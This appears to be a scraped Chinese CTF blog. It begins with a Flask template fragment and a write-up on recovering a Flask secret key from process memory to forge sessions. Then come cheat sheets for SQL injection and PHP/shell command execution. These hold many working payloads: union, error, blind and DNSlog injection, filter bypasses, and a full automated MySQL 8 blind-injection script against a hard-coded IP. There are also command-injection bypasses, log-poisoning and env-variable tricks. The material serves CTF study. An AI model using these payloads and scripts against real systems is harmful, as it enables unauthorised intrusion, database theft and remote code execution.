<div class="col-md-3 col-sm-6">
<div class="feature-block">
<img src="cats/{{a_cat}}.jpg" alt="{{a_cat}}">
<h5>{{a_cat}}</h5>
<p><a href="/info?file={{a_cat}}.txt">{{cat("./details/"+a_cat+".txt", 0, 80).decode()}}...</a></p>
</div>
</div>
{% endfor %}
</div>
<div class="spacer-50"></div>
</div>
</div>

<!-- Site Footer -->
<div class="site-footer-bottom">
<div class="container">
<div class="row">
<div class="col-md-6 col-sm-6">
<div class="copyrights-col-left">
<p>&copy; 2022 Cat cat by [email protected]. All Rights Reserved</p>
</div>
</div>
<div class="col-md-6 col-sm-6">
<div class="copyrights-col-right">

</div>
</div>
</div>
</div>
</div>
<a id="back-to-top"><i class="fa fa-angle-double-up"></i></a>
</div>
<script src="js/jquery-2.2.3.min.js"></script> <!-- Jquery Library Call -->
<script src="vendor/magnific/jquery.magnific-popup.min.js"></script> <!-- PrettyPhoto Plugin -->
<script src="js/ui-plugins.js"></script> <!-- UI Plugins -->
<script src="js/helper-plugins.js"></script> <!-- Helper Plugins -->
<script src="vendor/owl-carousel/js/owl.carousel.min.js"></script> <!-- Owl Carousel -->
<script src="js/bootstrap.js"></script> <!-- UI -->
<script src="js/init.js"></script> <!-- All Scripts -->
<script src="vendor/flexslider/js/jquery.flexslider.js"></script> <!-- FlexSlider -->
</body>
</html>

典中典 只因 删flag只存在变量中

简单分析一下,本题看着好像使用了模板,但是并不能打ssti,所以说需要通过任意文件读取的路由下载特定文件。Debug模式关闭,算pinconsole肯定不行了.

众所周知,python运行的时候,会把对象存储在堆区里,因此我们可以通过读取堆区的东西来过去key然后就能伪造session从admin路由堂而皇之的获取flag了,在本题中,提供了一个cat.py,这让我们可以带偏移量的读取文件,也就是说,拥有了在内存海洋里”航行”的船桨(不会出现指向内存的空指针),还有一个问题便是偏移量,不用担心,/proc/pid/maps就全都给出来了

比如这样:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
root@VM-8-17-ubuntu:/proc/59428# cat maps
00400000-00423000 r--p 00000000 fc:02 130987 /usr/bin/python3.8
00423000-006b0000 r-xp 00023000 fc:02 130987 /usr/bin/python3.8
006b0000-008ec000 r--p 002b0000 fc:02 130987 /usr/bin/python3.8
008ed000-008ee000 r--p 004ec000 fc:02 130987 /usr/bin/python3.8
008ee000-00935000 rw-p 004ed000 fc:02 130987 /usr/bin/python3.8
00935000-00958000 rw-p 00000000 00:00 0
00b1b000-00bc5000 rw-p 00000000 00:00 0 [heap]
7f082cb41000-7f082cd66000 rw-p 00000000 00:00 0
7f082cd66000-7f082d04c000 r--p 00000000 fc:02 161431 /usr/lib/locale/locale-archive
7f082d04c000-7f082d04f000 rw-p 00000000 00:00 0
7f082d04f000-7f082d051000 r--p 00000000 fc:02 138114 /usr/lib/x86_64-linux-gnu/libz.so.1.2.11
7f082d051000-7f082d062000 r-xp 00002000 fc:02 138114 /usr/lib/x86_64-linux-gnu/libz.so.1.2.11
7f082d062000-7f082d068000 r--p 00013000 fc:02 138114 /usr/lib/x86_64-linux-gnu/libz.so.1.2.11
7f082d068000-7f082d069000 ---p 00019000 fc:02 138114 /usr/lib/x86_64-linux-gnu/libz.so.1.2.11
7f082d069000-7f082d06a000 r--p 00019000 fc:02 138114 /usr/lib/x86_64-linux-gnu/libz.so.1.2.11
7f082d06a000-7f082d06b000 rw-p 0001a000 fc:02 138114 /usr/lib/x86_64-linux-gnu/libz.so.1.2.11
7f082d06b000-7f082d06d000 rw-p 00000000 00:00 0
7f082d06d000-7f082d071000 r--p 00000000 fc:02 130659 /usr/lib/x86_64-linux-gnu/libexpat.so.1.6.11
7f082d071000-7f082d08d000 r-xp 00004000 fc:02 130659 /usr/lib/x86_64-linux-gnu/libexpat.so.1.6.11
7f082d08d000-7f082d097000 r--p 00020000 fc:02 130659 /usr/lib/x86_64-linux-gnu/libexpat.so.1.6.11
7f082d097000-7f082d098000 ---p 0002a000 fc:02 130659 /usr/lib/x86_64-linux-gnu/libexpat.so.1.6.11
7f082d098000-7f082d09a000 r--p 0002a000 fc:02 130659 /usr/lib/x86_64-linux-gnu/libexpat.so.1.6.11
7f082d09a000-7f082d09b000 rw-p 0002c000 fc:02 130659 /usr/lib/x86_64-linux-gnu/libexpat.so.1.6.11
7f082d09b000-7f082d0aa000 r--p 00000000 fc:02 138508 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f082d0aa000-7f082d151000 r-xp 0000f000 fc:02 138508 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f082d151000-7f082d1e8000 r--p 000b6000 fc:02 138508 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f082d1e8000-7f082d1e9000 r--p 0014c000 fc:02 138508 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f082d1e9000-7f082d1ea000 rw-p 0014d000 fc:02 138508 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f082d1ea000-7f082d1eb000 r--p 00000000 fc:02 138626 /usr/lib/x86_64-linux-gnu/libutil-2.31.so
7f082d1eb000-7f082d1ec000 r-xp 00001000 fc:02 138626 /usr/lib/x86_64-linux-gnu/libutil-2.31.so
7f082d1ec000-7f082d1ed000 r--p 00002000 fc:02 138626 /usr/lib/x86_64-linux-gnu/libutil-2.31.so
7f082d1ed000-7f082d1ee000 r--p 00002000 fc:02 138626 /usr/lib/x86_64-linux-gnu/libutil-2.31.so
7f082d1ee000-7f082d1ef000 rw-p 00003000 fc:02 138626 /usr/lib/x86_64-linux-gnu/libutil-2.31.so
7f082d1ef000-7f082d1f0000 r--p 00000000 fc:02 138416 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f082d1f0000-7f082d1f2000 r-xp 00001000 fc:02 138416 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f082d1f2000-7f082d1f3000 r--p 00003000 fc:02 138416 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f082d1f3000-7f082d1f4000 r--p 00003000 fc:02 138416 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f082d1f4000-7f082d1f5000 rw-p 00004000 fc:02 138416 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f082d1f5000-7f082d1fc000 r--p 00000000 fc:02 138569 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f082d1fc000-7f082d20d000 r-xp 00007000 fc:02 138569 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f082d20d000-7f082d212000 r--p 00018000 fc:02 138569 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f082d212000-7f082d213000 r--p 0001c000 fc:02 138569 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f082d213000-7f082d214000 rw-p 0001d000 fc:02 138569 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f082d214000-7f082d218000 rw-p 00000000 00:00 0
7f082d218000-7f082d23d000 r--p 00000000 fc:02 138398 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f082d23d000-7f082d3b5000 r-xp 00025000 fc:02 138398 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f082d3b5000-7f082d3ff000 r--p 0019d000 fc:02 138398 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f082d3ff000-7f082d400000 ---p 001e7000 fc:02 138398 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f082d400000-7f082d403000 r--p 001e7000 fc:02 138398 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f082d403000-7f082d406000 rw-p 001ea000 fc:02 138398 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f082d406000-7f082d40c000 rw-p 00000000 00:00 0
7f082d412000-7f082d419000 r--s 00000000 fc:02 262948 /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache
7f082d419000-7f082d41a000 r--p 00000000 fc:02 138367 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f082d41a000-7f082d43d000 r-xp 00001000 fc:02 138367 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f082d43d000-7f082d445000 r--p 00024000 fc:02 138367 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f082d446000-7f082d447000 r--p 0002c000 fc:02 138367 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f082d447000-7f082d448000 rw-p 0002d000 fc:02 138367 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f082d448000-7f082d449000 rw-p 00000000 00:00 0
7fffbbe8a000-7fffbbeab000 rw-p 00000000 00:00 0 [stack]
7fffbbf92000-7fffbbf95000 r--p 00000000 00:00 0 [vvar]
7fffbbf95000-7fffbbf96000 r-xp 00000000 00:00 0 [vdso]

前面的便是地址和偏移量,只需要读取这些,然后再根据这个地址进行内存的读取就可以把key读出来了,然后就能读取内存了。

app.py里的代码来看,key后面跟着都是*abcdefgh,只需要找到含有这个字符串的内容输出,就能直接找到key了,还可以更简单粗暴一点,格式是UUID+”*abcdefgh”,可以写个正则表达式输出。

至于key获得了,就可以直接通过flask-session-cookie-manager3.py(github有源码)搞事情了qwq

总结:

1.在有任意文件读取的地方,可以通过/proc/pid/cmdline扫描进程
2.可以通过/proc/pid/fd/3恢复python中Open但是并没有close的文件

0xFFFF Reform



  
 CTF WEB LFI

SQL注入备忘录

SQL注入备忘录

最近在用sql-lib学sql注入,零零散散的笔记整了一大堆,现在整合一下,做个备忘录,方便比赛的时候方便查询。

典中典版本:

爆库版本: ?id=-1' union select 1,database(),3--+
爆库: ?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata --+
爆表: ?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='数据库'#
爆字段: ?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='数据表'#
这几个出来了,剩下的就不用我说了吧qwq

常用函数:

名称 作用
system_user() 系统用户名
user() 用户名
session_user() 连接数据库的用户名
database() 数据库名
version() MYSQL数据库版本
load_file() MYSQL读取本地文件的函数
@@datadir 读取数据库路径
@@basedir MYSQL 安装路径
@@version_compile_os 操作系统

报错注入:

extractvalue函数

都会,不解释了。
公式:extractvalue(数字,concat(0x7e,(查询语句),0x7e))

updatexml函数

都会,不解释了。
公式:updatexml(数字,concat(0x7e,(查询语句),0x7e),数字)

溢出报错

exp函数溢出 | mysql>5.5.53

原理:当传递一个大于 709 的值时,函数 exp() 就会引起一个溢出错误,用 ~ 运算符按位取反的方式得到一个最大值,该运算符也可以处理一个字符串,经过其处理的字符串会变成大一个很大整数足以超过 MySQL 的 Double 数组范围,从而报错输出。

1
2
3
4
5
6
7
8
9
10
11
mysql> select ~(select version());
+----------------------+
| ~(select version()) |
+----------------------+
| 18446744073709551610 |
+----------------------+
1 row in set, 1 warning (0.00 sec)

mysql> select exp(~(select * from(select version())x));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select '5.5.44-0ubuntu0.14.04.1' from dual)))'
mysql>

公式:select exp(~(select * from(查询语句)x));
支持load_file,最多13行

BIGINT溢出

差不多同样的原理,可以报错
公式:select 1+~(select*from(查询语句)x);
同理,其他的函数也可以这么干:

1
2
3
select !atan((select*from(查询语句)a))-~0;
select !ceil((select*from(查询语句)a))-~0;
select !floor((select*from(查询语句)a))-~0;

其他能利用的函数…

1
2
3
4
5
6
7
8
9
10
11
12
13
HEX
IN
FLOOR
CEIL
RAND
CEILING
TRUNCATE
TAN
SQRT
ROUND
SIGN
EXP
...

group by 注入 | 表中的数据至少要为三条才可以注入成功

原理:group_by注入

公式:select count(*) from information_schema.tables group by concat((查询语句),floor(rand()*2));
效率比较低qwq而且还有猜错的可能

无select注入 | MySQL 8

浅谈利用mysql8新特性进行SQL注入
脚本搬到这里了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
'''
@author qwzf
@desc 本脚本是用于mysql 8新特性的sql注入
@date 2021/02/18
'''
import requests
import string

url = 'http://121.41.231.75:8002/Less-8/?id='
chars=string.ascii_letters+string.digits+"@{}_-?"

def current_db(url):
print("利用mysql8新特性或普通布尔盲注:\n1.新特性(联合查询) 2.普通布尔盲注")
print("请输入序号:",end='')
num = int(input())
if num == 1:
payload = "-1' union values row(1,database(),3)--+" #联合查询爆当前数据库(可修改)
urls = url + payload
r = requests.get(url=urls)
print(r.text)
else:
name=''
payload = "1' and ascii(substr((database()),{0},1))={1}--+" #布尔盲注爆当前数据库(可修改)
for i in range(1,40):
char=''
for j in chars:
payloads = payload.format(i,ord(j))
urls = url + payloads
r = requests.get(url=urls)
if "You are in" in r.text:
name += j
print(name)
char = j
break
if char == '':
break

def str2hex(name):
res = ''
for i in name:
res += hex(ord(i))
res = '0x' + res.replace('0x','')
return res

def dbs(url): #无列名盲注爆所有数据库(可修改)
while True:
print("请输入要爆第几个数据库,如:1,2等:",end='')
x = int(input())-1
num = str(x)
if x < 0:
break
payload = "1' and ('def',{},'',4,5,6)>(table information_schema.schemata limit "+num+",1)--+"
name = ''
for i in range(1,20):
hexchar = ''
for char in range(32, 126):
hexchar = str2hex(name + chr(char))
payloads = payload.format(hexchar)
#print(payloads)
urls = url + payloads
r = requests.get(url=urls)
if 'You are in' in r.text:
name += chr(char-1)
print(name)
break

def tables_n(url,database): #无列名盲注爆数据表开始行数(可修改)
payload = "1' and ('def','"+database+"','','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)<(table information_schema.tables limit {},1)--+"
for i in range(0,10000):
payloads = payload.format(i)
urls = url + payloads
r = requests.get(url=urls)
if 'You are in' in r.text:
char = chr(ord(database[-1])+1)
database = database[0:-1]+char
payld = "1' and ('def','"+database+"','','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)<(table information_schema.tables limit "+str(i)+",1)--+"
urls = url + payld
res = requests.get(url=urls)
#print(i)
if 'You are in' not in res.text:
print('从第',i,'行开始爆数据表') #判断开始行数
n = i
break
return n

def tables(url,database,n): #无列名盲注爆数据表(可修改)
while True:
print("请输入要爆第几个数据表,如:1,2等:",end='')
x = int(input())-1
num = str(x + n)
if x < 0:
break
payload = "1' and ('def','"+database+"',{},'',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)>(table information_schema.tables limit "+num+",1)--+"
name = ''
for i in range(1,20):
hexchar = ''
for char in range(32, 126):
hexchar = str2hex(name + chr(char))
payloads = payload.format(hexchar)
#print(payloads)
urls = url + payloads
r = requests.get(url=urls)
if 'You are in' in r.text:
name += chr(char-1)
print(name)
break

def columns_n(url,database,table): #无列名盲注爆字段开始行数(可修改)
payload = "1' and ('def','"+database+"','"+table+"','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22)<(table information_schema.columns limit {},1)--+"
for i in range(3000,10000):
payloads = payload.format(i)
urls = url + payloads
r = requests.get(url=urls)
if 'You are in' in r.text:
char = chr(ord(table[-1])+1)
table = table[0:-1]+char
payld = "1' and ('def','"+database+"','"+table+"','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22)<(table information_schema.columns limit "+str(i)+",1)--+"
urls = url + payld
res = requests.get(url=urls)
#print(i)
if 'You are in' not in res.text:
print('从第',i,'行开始爆字段') #判断开始行数
n = i
break
return n

def columns(url,database,table,n): #无列名盲注爆字段值(可修改)
while True:
print("请输入要爆第几个字段,如:1,2等:",end='')
x = int(input())-1
num = str(x + n)
if x < 0:
break
payload = "1' and ('def','"+database+"','"+table+"',{},'',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22)>(table information_schema.columns limit "+num+",1)--+"
name = ''
for i in range(1,20):
hexchar = ''
for char in range(32, 126):
hexchar = str2hex(name + chr(char))
payloads = payload.format(hexchar)
#print(payloads)
urls = url + payloads
r = requests.get(url=urls)
if 'You are in' in r.text:
name += chr(char-1)
print(name)
break

def datas(url,table): #无列名盲注爆数据(可修改)
while True:
print("请输入要爆第几个数据,如:1,2等:",end='')
x = int(input())
y = x-1
num = str(y)
if y < 0:
break
payload = "1' and ("+str(x)+",{},'')>(table "+table+" limit "+num+",1)--+"
name = ''
for i in range(1,20):
hexchar = ''
for char in range(32, 126):
hexchar = str2hex(name + chr(char))
payloads = payload.format(hexchar)
#print(payloads)
urls = url + payloads
r = requests.get(url=urls)
if 'You are in' in r.text:
name += chr(char-1)
print(name)
break

if __name__ == "__main__":
while True:
print("请输入要操作的内容:\n1.爆当前数据库\n2.爆数据表开始行号\n3.爆数据表\n4.爆字段值开始行号\n5.爆字段值\n6.爆数据\n7.爆所有数据库")
types = int(input())
if types == 1:
current_db(url)
elif types == 2 or types == 3:
print("请输入已经得到的数据库名:",end='')
database = input()
if types == 2:
tables_n(url,database)
elif types == 3:
print("爆数据表开始行号:",end='')
n = int(input())
tables(url,database,n)
elif types == 4 or types == 5:
print("请输入已经得到的数据库名:",end='')
database = input()
print("请输入已经得到的数据表名:",end='')
table = input()
if types == 4:
columns_n(url,database,table)
elif types == 5:
print("爆字段值开始行号:",end='')
n = int(input())
columns(url,database,table,n)
elif types == 6:
print("请输入要查询的数据表名:",end='')
table = input()
datas(url,table)
else:
dbs(url)

时间盲注

原理都会,不讲了。

ascii判断:if(ascii(substr(查询语句,1,1))>115,1,sleep(3))
left语句判断:if(left(查询语句,1)='s',sleep(10),1)
if(left(查询语句,2)='sa',sleep(10),1)
substring函数判断:if(substring((查询语句),1,1='a'),11111,sleep(1))

布尔注入

同时间盲注,没啥东西

二次注入

也没啥太多活能整,可以使用flask框架本地中转一下,把繁琐的步骤交给机器做。

堆叠注入

能同时执行多条语句,要求比较高,这时候可以使用预编译了。
可以参考这题整花活**[强网杯 2019]随便注**
BUUCTF[强网杯 2019]随便注 的三种解法

Dnslog注入

要求mysql权限比较高,同时还得能出网
公式:select load_file(concat('\\',(查询语句),'.DNSLOG给的域名/任意字符'

搜索注入

原理:mysql查询的时候,常用的是select * from sqltest where names like '%要查询的关键字%
这时候就可以闭合%然后注入

宽字节注入 |使用了addslashes()函数 && 数据库设置了编码模式为GBK

原理: 前端输入%df时,首先经过addslashes()转义变成%df%5c%27,之后,在数据库查询前,因为设置了GBK编码,GBK编码在汉字编码范围内的两个字节都会重新编码成一个汉字。然后mysql服务器会对查询的语句进行GBK编码,%df%5c编码成了“运”,而单引号逃逸了出来,形成了注入漏洞。

1
2
3
4
5
?id=%df' and 1=1 --+

?id=%df' and 1=2 --+

?id=-1%df' union select 1,2,3 %23

limit注入 | 数据库版本比较低

原理:Mysql下Limit注入方法
公式:SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,查询语句)),1);

Bypass

空格

两个空格代替一个空格,用Tab代替空格,%a0=空格,括号代替空格,注释/*注释*/

引号 | 十六进制

这个时候如果引号被过滤了,那么上面的where子句就无法使用了。那么遇到这样的问题就要使用十六进制来处理这个问题了。users十六进制的字符串是7573657273。那么最后的sql语句就变为了:

select column_name from information_schema.tables where table_name=0x7573657273

逗号

在使用盲注的时候,需要使用到substr(),mid(),limit。这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用from to的方式来解决:

select substr(database() from 1 for 1);

select mid(database() from 1 for 1);

使用join:

union select 1,2#

等价于 union select * from (select 1)a join (select 2)b

使用like:

select ascii(mid(user(),1,1))=80 #

等价于 select user() like 'r%'

对于limit可以使用offset来绕过:

select * from news limit 0,1 #

等价于下面这条SQL语句 select * from news limit 1 offset 0

绕过比较符号()

(过滤了<>:sqlmap盲注经常使用<>,使用between的脚本):

使用greatest()、least():(前者返回最大值,后者返回最小值)

同样是在使用盲注的时候,在使用二分查找的时候需要使用到比较操作符来进行查找。如果无法使用比较操作符,那么就需要使用到greatest来进行绕过了。 最常见的一个盲注的sql语句:

select * from users where id=1 and ascii(substr(database(),0,1))>64

此时如果比较操作符被过滤,上面的盲注语句则无法使用,那么就可以使用greatest来代替比较操作符了。greatest(n1,n2,n3,…)函数返回输入参数(n1,n2,n3,…)的最大值。 那么上面的这条sql语句可以使用greatest变为如下的子句:

select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64

Between注入

主要用于盲注看页面是否有变化,原理如下,例如username的字符内容是test1,第一个字符是t,a到b搜索不了,页面不正常。 a到t就有了,页面正常

between 1 and 1; 等价于 =1

WHERE

可以使用having ,但是having只能用前面select已经选择的列名

1
2
select goods_price,goods_name from sw_goods where goods_price > 100
select goods_price,goods_name from sw_goods having goods_price > 100

过滤information_schema

可以查表名:

  1. InnoDb引擎
    从MYSQL5.5.8开始,InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_table_stats两张表,这两张表中都存储了数据库和其数据表的信息,但是没有存储列名。只需要把infromation_schema换成mysql.innodb_table_stats
  2. sys数据库
    在5.7以上的MYSQL中,新增了sys数据库,该库的基础数据来自information_schema和performance_chema,其本身不存储数据。可以通过其中的schema_auto_increment_columns来获取表名。只需要把information_schema换成sys.schema_auto_increment_columns就行了,其他的完全一样
    聊一聊bypass information_schema
    之后就需要无列名注入了

SLEEP

睡不了?就想办法让sql干重活慢下来
concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'

or and xor not绕过:

and=&& or=|| xor=| not=!

绕过注释符

(#,–(后面跟一个空格))过滤:

id=1' union select 1,2,3||'1

最后的or ‘1闭合查询语句的最后的单引号,或者:

id=1' union select 1,2,'3

绕过等于号

使用like 、rlike 、regexp 或者 使用< 或者 >

其他的bypass手段:

这个就看题目环境了,题目里随机多样,但是万变不离其宗。

Tircks

group by..with rollup - [SWPU2019]Web6

题目来源: [SWPU2019]Web6

此题开始进行sql注入,但是经过测试能发现注入点过滤很严格,使用with rollup产生一个NULL NULL的数据,然后用直接登陆即可

Sqlmap科技

未完待续

相关链接:

Sqli通关
flask框架
exp函数溢出注入
MySQL注入指北
group_by注入
group_by报错注入
BIGINT报错注入
SQL注入关联分析
浅谈利用mysql8新特性进行SQL注入
SQL注入之无列名注入
group by..with rollup学习实例

命令执行备忘录

命令执行备忘录

0x00 什么是RCE

RCE又称远程代码执行漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。

0x01 常见命令执行函数

1
2
PHP代码执行函数:
eval()、assert()、preg_replace()、create_function()、array_map()、call_user_func()、call_user_func_array()、array_filter()、uasort()...
1
2
PHP命令执行函数:
system()、exec()、shell_exec()、pcntl_exec()、popen()、proc_popen()、passthru()...

0x02 Bypass

1.关键词拦截:

  • 关键词替换为空的情况:

    • 双写绕过,比如cacatt -> cat
  • 仅拦截关键字:

    • 使用其他函数,比如拦截cat的时候,可以使用其他命令。

      Input Ouput
      static-sh ./flag.txt ./flag.txt: line 1: flag{this_is_a_test}: not found
      paste ./flag.txt /etc/passwd flag{this_is_a_test} root:x:0:0:root:/root:/bin/bash…
      diff diff ./flag.txt /etc/passwd
      curl file:///home/coffee/flag flag{this_is_a_test}
    • 通配符绕过,比如可以使用/b??/c?t f*该方法有时候会因为输出过多或者运行时间超出限制被强行中断

    • 插入"" <> '' \绕过,比如ca''t flag.txt或者ca\t flag.txt

    • 内联执行,将反引号内命令的输出作为输入执行,如: cat `ls`,或者是cat ${ls}

    • 使用变量替换,如$c=a;cat fl$cg.php

  • 拦截空格,空格可以用以下字符串代替:

    < 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等,比如:

    1
    2
    3
    4
    5
    6
    cat%09flag
    {cat,flag.txt}
    cat${IFS}flag.txt
    cat$IFS$9flag.txt
    cat<flag.txt
    cat<>flag.txt
  • .操作符
    eval函数中用.把被拦截的关键字给分开,比如

    1
    2
    <?php 
    eval(include "/www/lo"."g/nginx/access.log");
  • 逃逸,绕过太难了,直接润出来
    比如

    1
    2
    c=include$_GET[1]?> 
    c=eval($_GET[1])
  • 借壳生蛋

    1
    2
    3
    4
    5
    6
    7
    8
    <?php
    $env = $_GET['env'];
    if(isset($env)){
    putenv($env);
    system("whoami");
    }else{
    highlight_file(__FILE__);
    }

    ?env=BASH_FUNC_whoami%%=() { ls; }
    whoamisystem(“whoami”)启动的bash环境的函数,相当于我们注册了一个whoami替换它

  • 构造
    在PHP7中,可以这样调用函数:

    1
    2
    3
    ('phpinfo')();
    $a = "phpinfo";$$a;
    ...

    然后就可以使用异或^,取反~,自增++,自减--等方法构造想要的字符然后进行动态函数调用。

    构造字符的时候,可以利用一些PHP的特性:

    • PHP中的NAN和INF:
      1
      2
      3
      4
      5
      6
      NaN(Not a Number,非数)是计算机科学中数值数据类型的一类值,表示未定义或不可表示的值。常在浮点数运算中使用。首次引入NaN的是1985年的IEEE 754浮点数标准。

      INF:infinite,表示“无穷大”。 超出浮点数的表示范围(溢出,即阶码部分超过其能表示的最大值)。

      $_=C/C;//NAN
      $_=1/C//INF

2.无回显

  • 利用sleep()之类的函数来根据服务器响应的时间一个一个字符获获取
    注:该方法局限性很大,且容易受到网络波动影响,不建议优先考虑使用

  • 利用dns外带http://dnslog.cn/
    注:该方法也有一定的局限性,有长度限制而且不支持特殊字符

  • 利用重定向,将输出重定向到可访问网页中

  • 反弹shell
    如果题目不出网只能寄

  • 命令注入,尝试在命令后面加上||%0a%0d|;&等符号将原先重定向到/dev/null的命令分割开

3.include

  • 伪协议
  • 日志包含
    UA写马,包含access.log
  • allow_url_include=ture可以使用的data
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    data类型扩展:

    data类型扩展
    data:,<文本数据>
    data:text/plain,<文本数据>
    data:text/html,<HTML代码>
    data:text/html;base64,<base64编码的HTML代码>
    data:text/css,<CSS代码>
    data:text/css;base64,<base64编码的CSS代码>
    data:text/javascript,<Javascript代码>
    data:text/javascript;base64,<base64编码的Javascript代码>
    data:image/gif;base64,base64编码的gif图片数据
    data:image/png;base64,base64编码的png图片数据
    data:image/jpeg;base64,base64编码的jpeg图片数据
    data:image/x-icon;base64,base64编码的icon图片数据
    Tips: PHP具有极强的鲁棒性特别耐操,尤其是伪协议这块。
    1
    2
    3
    4
    5
    6
    7
    原payload:php://filter/convert.base64-encode/resource=index.php

    我可以插♂ 入一些奇怪的东西
    php://filter/convert.base64-encode/114514/resource=index.php

    我可以大大小小
    php://FiLTer/convert.base64-encode/resource=index.php

4.无参命令执行

这种就基本没活能整了,已经十分固定下来了

1
2
3
4
5
6
<?php
highlight_file(__FILE__);
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {
eval($_GET['code']);
}
?>
  • '/[^\W]+\((?R)?\)/'的解释

    这里使用pregreplace替换匹配到的字符为空,\w匹配字母、数字和下划线,等价于 [^A-Za-z0-9],然后(?R)?这个意思为递归整个匹配模式。所以正则的含义就是匹配无参数的函数,内部可以无限嵌套相同的模式(无参数函数),将匹配的替换为空,判断剩下的是否只有;

    以上正则表达式只匹配a(b(c()))或a()这种格式,不匹配a(“123”),也就是说我们传入的值函数不能带有参数,所以我们要使用无参数的函数进行文件读取或者命令执行。

  • 一些有用的东西

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
目录操作:
getchwd() :函数返回当前工作目录。
scandir() :函数返回指定目录中的文件和目录的数组。
dirname() :函数返回路径中的目录部分。
chdir() :函数改变当前的目录。

数组相关的操作:
end() - 将内部指针指向数组中的最后一个元素,并输出。
next() - 将内部指针指向数组中的下一个元素,并输出。
prev() - 将内部指针指向数组中的上一个元素,并输出。
reset() - 将内部指针指向数组中的第一个元素,并输出。
each() - 返回当前元素的键名和键值,并将内部指针向前移动。
array_shift() - 删除数组中第一个元素,并返回被删除元素的值。

读文件

show_source() - 对文件进行语法高亮显示。
readfile() - 输出一个文件。
highlight_file() - 对文件进行语法高亮显示。
file_get_contents() - 把整个文件读入一个字符串中。
readgzfile() - 可用于读取非 gzip 格式的文件

PAYLOAD

  1. 请求头

    1
    2
    3
    GET /1.php?code=eval(end(getallheaders())); HTTP/1.1
    .....
    flag: system('id');
  2. get_defined_vars()

    1
    ?code=eval(end(current(get_defined_vars())));&flag=system('ls');

    利用全局变量进RCE

get_defined_vars():返回由所有已定义变量所组成的数组,会返回 _GET,_POST, _COOKIE, _FILES全局变量的值,返回数组顺序为get->post->cookie->files
current:返回数组中的当前单元,初始指向插入到数组中的第一个单元,也就是会返回$_GET变量的数组值

3.session_start()

  • session_start():启动新会话或者重用现有会话,成功开始会话返回 TRUE ,反之返回 FALSE,返回参数给session_id()

  • session_id():获取/设置当前会话 ID,返回当前会话ID。 如果当前没有会话,则返回空字符串(””)。
    文件读取

  • show_source(session_id(session_start()));

